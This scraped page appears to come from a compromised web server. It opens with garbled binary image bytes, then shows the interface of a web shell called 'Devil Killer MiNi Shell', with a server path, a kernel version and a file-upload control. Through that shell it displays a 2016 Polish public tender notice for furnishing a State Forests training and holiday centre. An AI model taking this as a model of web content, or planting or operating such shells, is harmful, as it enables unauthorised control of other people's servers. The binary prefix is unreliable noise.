JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160520/129092-N-2016.html

<p class="kh_header"><b>Solec Kujawski: Dostawa i montaż wyposażenia, w tym m.in. umeblowania i sprzętu RTV i AGD w Ośrodku Szkoleniowo-Wypoczynkowym Lasów Państwowych przy Nadleśnictwie Solec Kujawski</b><br>
<b>Numer ogłoszenia: 129092 - 2016; data zamieszczenia: 20.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Solec Kujawski , ul. Leśna 64, 86-050 Solec Kujawski, woj. kujawsko-pomorskie, tel. 052 3871471, faks 052 3871305.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.solec-kujawski.torun.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Solec Kujawski.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż wyposażenia, w tym m.in. umeblowania i sprzętu RTV i AGD w Ośrodku Szkoleniowo-Wypoczynkowym Lasów Państwowych przy Nadleśnictwie Solec Kujawski.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż (instalacja) wyposażenia budynku Ośrodka Szkoleniowo-Wypoczynkowego Lasów Państwowych przy Nadleśnictwie Solec Kujawski, tj. umeblowania, wraz z elementami wystroju oraz sprzętu RTV i AGD.
Oferowane wyposażenie, meble wraz elementami wystroju muszą być fabrycznie nowe, wolne od wad, muszą odpowiadać obowiązującym standardom jakościowym i technicznym, nie mogą być obciążone żadnymi prawami na rzecz osób trzecich oraz muszą spełniać wymagania przedstawione w niniejszej specyfikacji.
Zamówienie obejmuje także wykonanie koncepcji aranżacji wnętrz (wizualizacje) wskazanych pomieszczeń. 
Wymagania ogólne dotyczące dostawy
Wykonanie, dostarczenie oraz montaż wyposażenia Ośrodka Szkoleniowo-Wypoczynkowego Lasów Państwowych przy Nadleśnictwie Solec kujawski, zgodnie z założeniami koncepcji aranżacji wnętrz obejmującego: meble, tekstylia, elementy dekoracyjne i inne elementy wyposażenia oraz sprzęt AGD i RTV.
Dokładne wymiary wszystkich mebli, ich kolorystykę, dokładne grubości płyt do wykonania mebli i blatów, rodzaje uchwytów i mechanizmów oraz styl określała będzie koncepcja aranżacji wnętrz przygotowana przez wykonawcę i zaakceptowana przez zamawiającego, w ramach niniejszego postępowania. 
Zaproponowane elementy wyposażenia powinny być nowoczesne; kolory wykładzin, ścian, zasłon, tapicerki itp. - we wszystkich pomieszczeniach obiektu winny być ciepłe, stonowane. 
Meble powinny być proste, funkcjonalne, zapewniające komfort korzystania, utrzymane w jednolitym stylu i barwie, odporne na przypadkowe uszkodzenia, łatwe w utrzymaniu czystości, niewymagające zbyt częstych zabiegów konserwacyjnych. Muszą być nowe, bez wad produkcyjnych. 
Zastosowana do wszystkich mebli (szafy garderobiane otwarte, biurko, szafki z lodówką (minibar), bagażnik, wieszak, stoły, lady itd.) płyta musi być melaminowana (o grubości minimum 28 mm), w przypadku blatów musi spełniać wymogi klasy higieniczności E 1 lub równoważne, wszystkie krawędzie mebli oklejone ABS, co najmniej 2 mm grubości lub HPL, w kolorze płyty. Wymagana technologia produkcji mebli - klejenie. Tyły mebli również oklejane. 
W przypadku tapicerki, ważnym czynnikiem jest wytrzymałość mechaniczna, mierzona w skali Martinadalea. 
Wszystkie produkty muszą spełniać wymogi użytkowe obiektów użyteczności publicznej.
Zastosowane wykładziny, tkaniny, obicia i wypełnienia mebli muszą posiadać atesty niepalności i gwarancje trwałości. Wyposażenie pokoi hotelowych musi spełniać wymagania przeciwpożarowe. 
Łóżka hotelowe muszą posiadać wszystkie wymagane atesty, certyfikaty i aprobaty techniczne. 
Montaż wyposażenia, będącego przedmiotem niniejszego zamówienia, będzie polegał na ustawieniu, wypoziomowaniu, wyregulowaniu, zawieszeniu poszczególnych elementów, zamontowaniu urządzeń, podłączeniu mediów i próbnych uruchomieniach, zgodnie z zaprojektowanym przez wykonawcę i zaakceptowanym przez zamawiającego miejscem przeznaczenia. Wykonawca dokona ponadto przeszkolenia osób wskazanych przez zamawiającego w zakresie niezbędnym do prawidłowej obsługi dostarczonych elementów wyposażenia i urządzeń.
Koszty transportu, opakowania, ubezpieczenia na czas przewozu oraz montażu wszystkich elementów objętych zamówieniem ponosi wykonawca. 
Dokładny termin i godzina montażu mebli i pozostałych elementów objętych zamówieniem muszą być wcześniej uzgodnione z zamawiającym. 
Wyposażenie pokoju dla osoby niepełnosprawnej musi być spójne z wyposażeniem pozostałych pokoi, jednakże spełniające wszystkie obowiązujące wymogi i wytyczne w tym zakresie.
Wymagania dedykowane dla poszczególnych pomieszczeń:
Pokoje hotelowe na piętrze obiektu:
Na piętrze obiektu istnieje 9 pokoi dwuosobowych, 1 pokój trzyosobowy oraz 2 pokoje jednoosobowe.
Wyposażenie ww. pokoi musi nawiązywać do istniejących rozwiązań w pokojach na parterze. 
Meble w pokojach powinny być proste, eleganckie, trwałe i wandaloodporne, wykonane na wymiar, każdorazowo dostosowane do układu i wielkości pokoi. Dostawa i montaż następujących elementów:
szafka nocna z szufladą, 
biurko lub toaletka: blat odporny na temperaturę i zarysowania, ewentualnie (w zależności od projektu aranżacji) płyta naścienna nad biurkiem i lustro, miejsce na tackę z czajnikiem i ekspres oraz 2 filiżanki, dwie płaskie szuflady pod blatem,
komoda (szuflady i półki),
łóżka kontynentalne z wezgłowiem, wymiary łóżek: szerokość 80cm i długość 200cm, wysokość łóżka z materacem 50-60cm, łatwe do przesuwania, umożliwiające sprzątanie, z możliwością łączenia (twin-single),
wezgłowie nietapicerowane, wykonane z tego samego materiału jak pozostałe meble w pokoju, 
materac 3-warstwowy (materac baza, materac główny, wierzchni toper) w tym materac wierzchni, kieszeniowy, nadający się do obracania ze strony lewej na prawą oraz z góry na dół (obustronny, tzn. przeznaczony do spania po obu stronach), 
dostawka hotelowa o konstrukcji-metalowy stelaż i listwy sklejkowe sprężynujące, po złożeniu łóżko przechodzi w tryb jezdny. Wymiary zewnętrzne łóżka rozłożonego: 205 x 80cm. Całkowita wysokość z materacami: 38cm.,
Dwuczęściowy materac piankowy w pokrowcu do prania o wymiarach 200x80x10cm.
podkłady higieniczne na materace: podkład nieprzemakający, oddychający, antybakteryjny, do prania w temperaturze 95 st.C. Wierzchnia część wykonana z tkaniny frotte, spód z oddychającego PU. Podkład o jak najmniejszej grubości, niepowodujący zmiany właściwości ergonomicznych materaca,
krzesła lub foteliki (w zależności od projektu aranżacji): tapicerowane, minimum 40 tys. cykli w skali Martindalea, siedzisko z pianki poliuretanowej odpornej na odkształcenia, 
bagażnik na walizki z zabezpieczeniem ściany przed uszkodzeniami, blat zabezpieczony przed porysowaniem aluminiowymi listwami, 
wiszące lustro pionowe, co najmniej 100 cm wys., w ramie jak meble, 
panel z haczykami na odzież wierzchnią, wykonany z tego samego materiału, co pozostałe meble w pokoju.
Recepcja
Dostawa i montaż następujących elementów:
kanapa: tapicerowana (dokładny styl i model określi projekt aranżacji, w ramach niniejszego postępowania), minimum 100 tys. cykli w skali Martindalea, 
stolik (dokładny styl i model określi projekt aranżacji, w ramach niniejszego postępowania), 
nadstawka na ladę (dokładny styl i model określi projekt aranżacji, w ramach niniejszego postępowania), 
szuflada kasjerska do trwałego zamontowania w istniejącej ladzie,
krzesła biurowe obracane, miękkie, tapicerowane siedzisko i oparcie z obu stron, regulacja siły oporu oparcia, regulowana wysokość krzesła, regulowana wysokość oparcia, podłokietniki regulowane, samohamowne kółka do powierzchni dywanowych lub twardych, gwarancja minimum 3 lata, 
maszyna do czyszczenia butów, elektryczny automat do czyszczenia, polerowania i nabłyszczania butów z min 4 szczotkami, dozownikiem pasty i uchwytem.
szafka z wieszakami na klucze
Pomieszczenie techniczne (magazynek 1)
Dostawa i montaż następujących elementów:
regał drewniany z półkami, mocowany do ściany,
szafa na dokumenty z półkami,
folia perforowana na szybę okna, naklejana od strony wewnętrznej w kolorze, gwarantująca jak najmniejszą przejrzystość od strony zewnętrznej obiektu. 
Pomieszczenie techniczne (kotłownia)
Dostawa i montaż następujących elementów:
folia perforowana na szybę okna, naklejana od strony wewnętrznej w kolorze, gwarantująca jak najmniejszą przejrzystość od strony zewnętrznej obiektu
Pomieszczenie sanitarne (toaleta damska i męska)
Dostawa i montaż następujących elementów:
folia perforowana na szybę okna, naklejana od strony wewnętrznej w kolorze, gwarantująca jak najmniejszą przejrzystość od strony zewnętrznej obiektu
Pomieszczenie socjalne
Dostawa i montaż następujących elementów:
szafka kuchenna, wisząca nad zlewem (suszarka),
szafka kuchenna, wisząca, z półkami,
szafka kuchenna, stojąca z szufladami,
szafka kuchenna, stojąca z półkami,
drzwiczki do szafki pod zlewem,
blat kuchenny,
stolik + krzesła,
szafa wysoka, ubraniowa, zamykana,
wieszak z półką,
szafka medyczna,
wózek kelnerski,
czajnik elektryczny.
Pomieszczenie techniczne (magazynek 2)
Dostawa i montaż następujących elementów:
regał drewniany z półkami, mocowany do ściany
Szatnia
Dostawa i montaż następujących elementów:
breloczki drewniane z grawerowanym numerem oraz logo LP 
Biuro
Meble muszą być dostosowane do układu i wielkości pomieszczenia. Dostawa i montaż następujących elementów:
biurko z szufladami bądź szafkami zamykanymi zamkiem, 
krzesło obrotowe, miękkie, tapicerowane siedzisko i oparcie z obu stron, regulacja siły oporu oparcia, regulowana wysokość krzesła, regulowana wysokość oparcia, podłokietniki regulowane, samohamowne kółka do powierzchni dywanowych lub twardych, 
szafa wysoka z półkami, zamykana na zamek, 
szafa wysoka ubraniowa, z lustrem wewnętrznym,
szafka niska z półkami,
regał na dokumenty, estetycznie dostosowany do szaf, 
stolik + 2 krzesła,
sofa rozkładana z pojemnikiem,
czajnik elektryczny.
Pomieszczenie rekreacyjne na piętrze (pomieszczenie mokre)
Dostawa i montaż następujących elementów:
leżaki drewniane,
stolik drewniany,
wieszak metalowy, naścienny,
folia perforowana na szybę okna, do wysokości 110cm, naklejana od strony wewnętrznej w kolorze, gwarantująca jak najmniejszą przejrzystość od strony zewnętrznej obiektu,  
napis 3D o treści: OSW LEŚNY realizowany w połączeniu z folią na szybie.
Pomieszczenie rekreacyjne na piętrze (miejsce spotkań wspólnych)
Dostawa i montaż następujących elementów:
sofy dwuosobowe,
stoliki drewniane,
tarcza elektroniczna do gry w rzutki (dart),
stół do gry w piłkarzyki,
telewizor 55 cali LED, FullHD + zawiesie naścienne
Zasłony i mocowanie w apartamentach 
Dostawa i montaż następujących elementów:
Zasłony z tkaniny zaciemniającej (blackout), uniepalniona na etapie produkcji, wykonana z materiału o szerokości minimum 300 cm, pozwalająca na uszycie zasłon bez przeszyć. Wewnętrzna faktura tkaniny - wyraźna, nie gładka, wyglądem przypominająca len (drobna kratka), dopasowana kolorystycznie do obić tapicerskich. Wymagany atest niepalności klasy 1 europejski lub krajowy. 
Nie dopuszcza się stosowania tkanin zwykłych, preparowanych do uniepalniania krótkotrwałego poprzez zanurzanie lub natryskiwanie preparatów trudnopalnych itp. ze względu na niską jakość trudnopalności uzyskiwaną takimi metodami. 
Sposób mocowania zasłon funkcjonalny z możliwością płynnego i cichego przesuwania w obie strony, uniemożliwiający łatwe wyrwanie zasłony z zacisków, możliwe zastosowanie prętów ułatwiających przesuwanie. Zasłony na całą wysokość ściany, po rozsunięciu całkowicie zakrywające okno
Apartament A
Meble w apartamencie powinny być proste, eleganckie, trwałe i wandaloodporne, wykonane na wymiar, dostosowane do układu i wielkości pomieszczeń.
Dostawa i montaż następujących elementów:
SALON:
sofa sześcioosobowa, tapicerowana,
fotel, tapicerowany,
stolik kawowy, niski,
szafka telewizyjna,
komoda,
telewizor 55 cali LED, FullHD + zawiesie naścienne,
zestaw kina domowego (z odtwarzaczem blu-ray),
folia perforowana na szybę okna, do wysokości 110cm, naklejana od strony wewnętrznej w kolorze, gwarantująca jak najmniejszą przejrzystość od strony zewnętrznej obiektu,  
zasłony,
zegar cyfrowy.
ANEKS KUCHENNY:
szafka kuchenna, stojąca, półki
szafka kuchenna, stojąca, szuflady
blat kuchenny,
szafka kuchenna, wisząca, witryna
szafka kuchenna, wisząca, zabudowa okapu
mini-zestaw zintegrowany (lodówka, zlew, płyta grzewcza po lewej stronie, kuchenka mikrofalowa)
szafka kuchenna stojąca, kosz 
okap teleskopowy,
stół + 4 krzesła,
czajnik elektryczny bezprzewodowy,	
ekspres ciśnieniowy, kapsułki.
SYPIALNIA:
szafki nocne z szufladą, 
biurko lub toaletka: blat odporny na temperaturę i zarysowania, ewentualnie (w zależności od projektu aranżacji) płyta naścienna nad biurkiem i lustro, dwie płaskie szuflady pod blatem,
krzesło lub fotelik (w zależności od projektu aranżacji): tapicerowane, minimum 40 tys. cykli w skali Martindalea, siedzisko z pianki poliuretanowej odpornej na odkształcenia, 
łóżko kontynentalne z wezgłowiem, wymiary łóżek: szerokość 160 cm i długość 200 cm, wysokość łóżka z materacem 50 - 60 cm, łatwe do przesuwania, umożliwiające sprzątanie, z możliwością łączenia (twin - single),
wezgłowie nietapicerowane, wykonane z tego samego materiału jak pozostałe meble w pokoju, 
materac 3-warstwowy (materac baza, materac główny, wierzchni toper) w tym materac wierzchni, kieszeniowy, nadający się do obracania ze strony lewej na prawą oraz z góry na dół (obustronny, tzn. przeznaczony do spania po obu stronach), 
podkłady higieniczne na materace: podkład nieprzemakający, oddychający, antybakteryjny. Do prania w temperaturze 95 st.C. Wierzchnia część wykonana z tkaniny frotte, spód z oddychającego PU. Podkład o jak najmniejszej grubości, niepowodujący zmiany właściwości ergonomicznych materaca.
folia perforowana na szybę okna, do wysokości 110cm, naklejana od strony wewnętrznej w kolorze, gwarantująca jak najmniejszą przejrzystość od strony zewnętrznej obiektu,  
lampki nocne,
suszarka elektryczna łazienkowa,
zasłony.
GARDEROBA:
szafa do zabudowy (pełna wysokość pomieszczenia), drzwi przesuwne - lustro, półki oraz wieszaki.
PRZEDPOKÓJ:
bagażnik na walizki z zabezpieczeniem ściany przed uszkodzeniami, blat zabezpieczony przed porysowaniem aluminiowymi listwami, 
wiszące lustro pionowe, co najmniej 100 cm wys., w ramie jak meble, 
panel z haczykami na odzież wierzchnią, wykonany z tego samego materiału, co pozostałe meble w pokoju.
Apartament B
Meble w apartamencie powinny być proste, eleganckie, trwałe i wandaloodporne, wykonane na wymiar, dostosowane do układu i wielkości pomieszczenia.
Dostawa i montaż następujących elementów:
szafki nocne z szufladą, 
biurko lub toaletka: blat odporny na temperaturę i zarysowania, ewentualnie (w zależności od projektu aranżacji) płyta naścienna nad biurkiem i lustro, dwie płaskie szuflady pod blatem,
krzesło lub fotelik (w zależności od projektu aranżacji): tapicerowane, minimum 40 tys. cykli w skali Martindalea, siedzisko z pianki poliuretanowej odpornej na odkształcenia, 
łóżko kontynentalne z wezgłowiem, wymiary łóżek: szerokość 90 cm i długość 200 cm, wysokość łóżka z materacem 50 - 60 cm, łatwe do przesuwania, umożliwiające sprzątanie, z możliwością łączenia (twin - single),
wezgłowie nietapicerowane, wykonane z tego samego materiału jak pozostałe meble w pokoju, 
materac 3-warstwowy (materac baza, materac główny, wierzchni toper) w tym materac wierzchni, kieszeniowy, nadający się do obracania ze strony lewej na prawą oraz z góry na dół (obustronny, tzn. przeznaczony do spania po obu stronach), 
podkłady higieniczne na materace: podkład nieprzemakający, oddychający, antybakteryjny. Do prania w temperaturze 95 st.C. Wierzchnia część wykonana z tkaniny frotte, spód z oddychającego PU. Podkład o jak najmniejszej grubości, niepowodujący zmiany właściwości ergonomicznych materaca.
folia perforowana na szybę okna, do wysokości 110 cm, naklejana od strony wewnętrznej w kolorze, gwarantująca jak najmniejszą przejrzystość od strony zewnętrznej obiektu, 
bagażnik na walizki z zabezpieczeniem ściany przed uszkodzeniami, blat zabezpieczony przed porysowaniem aluminiowymi listwami, 
wiszące lustro pionowe, co najmniej 100 cm wys., w ramie jak meble, 
panel z haczykami na odzież wierzchnią, wykonany z tego samego materiału, co pozostałe meble w pokoju,
czajnik elektryczny bezprzewodowy,
ekspres ciśnieniowy, kapsułki.
lampki nocne,
suszarka elektryczna łazienkowa,
zasłony,
zegar cyfrowy.
Apartament C
Meble w apartamencie powinny być proste, eleganckie, trwałe i wandaloodporne, wykonane na wymiar, dostosowane do układu i wielkości pomieszczenia.
Dostawa i montaż następujących elementów:
szafki nocne z szufladą, 
biurko lub toaletka: blat odporny na temperaturę i zarysowania, ewentualnie (w zależności od projektu aranżacji) płyta naścienna nad biurkiem i lustro, dwie płaskie szuflady pod blatem,
krzesło lub fotelik (w zależności od projektu aranżacji): tapicerowane, minimum 40 tys. cykli w skali Martindalea, siedzisko z pianki poliuretanowej odpornej na odkształcenia, 
łóżko kontynentalne z wezgłowiem, wymiary łóżek: szerokość 90 cm i długość 200 cm, wysokość łóżka z materacem 50 - 60 cm, łatwe do przesuwania, umożliwiające sprzątanie, z możliwością łączenia (twin - single),
wezgłowie nietapicerowane, wykonane z tego samego materiału jak pozostałe meble w pokoju, 
materac 3-warstwowy (materac baza, materac główny, wierzchni toper) w tym materac wierzchni, kieszeniowy, nadający się do obracania ze strony lewej na prawą oraz z góry na dół (obustronny, tzn. przeznaczony do spania po obu stronach), 
podkłady higieniczne na materace: podkład nieprzemakający, oddychający, antybakteryjny. Do prania w temperaturze 95 st.C. Wierzchnia część wykonana z tkaniny frotte, spód z oddychającego PU. Podkład o jak najmniejszej grubości, niepowodujący zmiany właściwości ergonomicznych materaca.
folia perforowana na szybę okna, do wysokości 110 cm, naklejana od strony wewnętrznej w kolorze, gwarantująca jak najmniejszą przejrzystość od strony zewnętrznej obiektu, 
bagażnik na walizki z zabezpieczeniem ściany przed uszkodzeniami, blat zabezpieczony przed porysowaniem aluminiowymi listwami, 
wiszące lustro pionowe, co najmniej 100 cm wys., w ramie jak meble, 
panel z haczykami na odzież wierzchnią, wykonany z tego samego materiału, co pozostałe meble w pokoju,
czajnik elektryczny bezprzewodowy,
ekspres ciśnieniowy, kapsułki.
lampki nocne,
suszarka elektryczna łazienkowa,
zasłony,
zegar cyfrowy.
Pomieszczenie rekreacyjne na parterze (sauna)
Dostawa i montaż następujących elementów:
szafa ubraniowa, wysoka,
ławeczka drewniana, czteroosobowa,
wieszak drewniany z półką, naścienny,
wieszak metalowy z półką, naścienny,
sauna fińska drzwi szklane i witryna oraz pełne wyposażenie,
leżaki drewniane,
stół do tenisa stołowego, składany na skrętnych kółkach.
Uzupełnienie o dostawki hotelowe pokoi hotelowych na parterze obiektu
Dostawa i montaż następujących elementów:
Dostawka hotelowa o konstrukcji - metalowy stelaż i listwy sklejkowe sprężynujące, po złożeniu łóżko przechodzi w tryb jezdny. Wymiary zewnętrzne łóżka rozłożonego: 205x80cm. Całkowita wysokość z materacami: 38cm.,
Dwuczęściowy materac piankowy w pokrowcu do prania o wymiarach 200x80x10cm
Szczegółowe wymagania dotyczące oferowanych elementów wyposażenia i sprzętu przedstawione są w specyfikacji technicznej dostawy, stanowiącej załącznik nr 8 do SIWZ
W celu przygotowania oferty niezbędne jest dokonanie przez oferenta pomiarów w naturze pomieszczeń objętych dostawą wyposażenia. Załącznik nr 8 do SIWZ stanowi jedynie informację poglądową, mającą na celu przybliżenie oczekiwań zamawiającego, w tym m.in. określenie przybliżonych wymiarów elementów wyposażenia. Ze względu na konieczność dopasowania wyposażenia do wielkości i kształtów istniejących pomieszczeń, ustalenie ostatecznych wymiarów elementów wyposażenia nastąpi po dokonaniu szczegółowych pomiarów przez oferenta w obiekcie. W tym celu zamawiający udostępni obiekt oferentowi, po wcześniejszym uzgodnieniu terminu. Uzgodnienia powyższego należy dokonać z przedstawicielem zamawiającego, którym jest p. Radosław Banaś-tel: 52 387 14 71 lub 731 436 100.  
Wymagania dodatkowe
Zamawiający wymaga, aby wykonawca załączył do oferty koncepcje aranżacji wnętrz (wizualizacje) obejmujące: a) pomieszczenie rekreacyjne na piętrze (miejsce spotkań wspólnych), b) salon apartamentu A oraz c) pokój apartamentu B.
W ciągu 4 dni od podpisania umowy wykonawca dokona wraz z zamawiającym ostatecznych uzgodnień dot. przedstawionych koncepcji aranżacji. W toku uzgodnień, zamawiający może wnosić o korekty koncepcji, aż do momentu otrzymania od wykonawcy materiału odpowiadającego oczekiwaniom zamawiającego. Wykonawca zobowiązuje się dostarczyć zmienioną koncepcję (z uwzględnieniem uwag zamawiającego) w ciągu 2 dni od dnia uzgodnień. 
Ostateczna koncepcja musi zostać zaakceptowana przez Zamawiającego. 
Projekt aranżacji wnętrz musi obejmować: dobór mebli, elementów dekoracyjnych, opracowanie części rysunkowej, rzuty, wizualizacje, próbki materiałowe.
Dostarczone elementy wyposażenia i urządzenia muszą pochodzić z autoryzowanego kanału dystrybucji producenta przeznaczonego na teren Unii Europejskiej, a korzystanie przez zamawiającego z dostarczonego produktu nie może stanowić naruszenia majątkowych praw autorskich osób trzecich.
Poszczególne rodzaje wyposażenia i urządzeń muszą być objęte gwarancją (wraz z świadczeniami serwisowymi) producenta niezależne od statusu partnerskiego wykonawcy. Do każdego urządzenia dołączona zostanie instrukcja obsługi w języku polskim i dokument gwarancyjny. Oferowany serwis gwarancyjny musi zapewnić zamawiającemu przez cały okres trwania gwarancji:
możliwość zgłoszenia awarii urządzenia bezpośrednio producentowi urządzenia (a nie tylko wykonawcy zamówienia), 
naprawę lub wymianę elementu wyposażenia lub urządzenia w ciągu maksymalnie 5 dni roboczych od zdiagnozowania awarii
Adres dostawy
Ośrodek Szkoleniowo-Wypoczynkowy Lasów Państwowych przy Nadleśnictwie Solec Kujawski, ul. Leśna 64, 86-050 Solec Kujawski.
Opisany przedmiot zamówienia stanowi jedno niepodzielne zadanie.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 79.93.20.00-6, 79.93.40.00-0, 39.15.00.00-8, 39.15.60.00-0, 39.11.00.00-6, 39.12.00.00-9, 39.51.50.00-5, 39.14.31.10-0, 39.14.31.12-4, 39.14.30.00-6, 39.14.31.00-7, 39.14.31.11-7, 39.14.31.12-4, 39.14.31.13-1, 39.14.31.21-0, 39.14.31.20-3, 39.51.50.00-5, 39.71.00.00-2, 31.71.00.00-6, 32.32.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2016.</p>
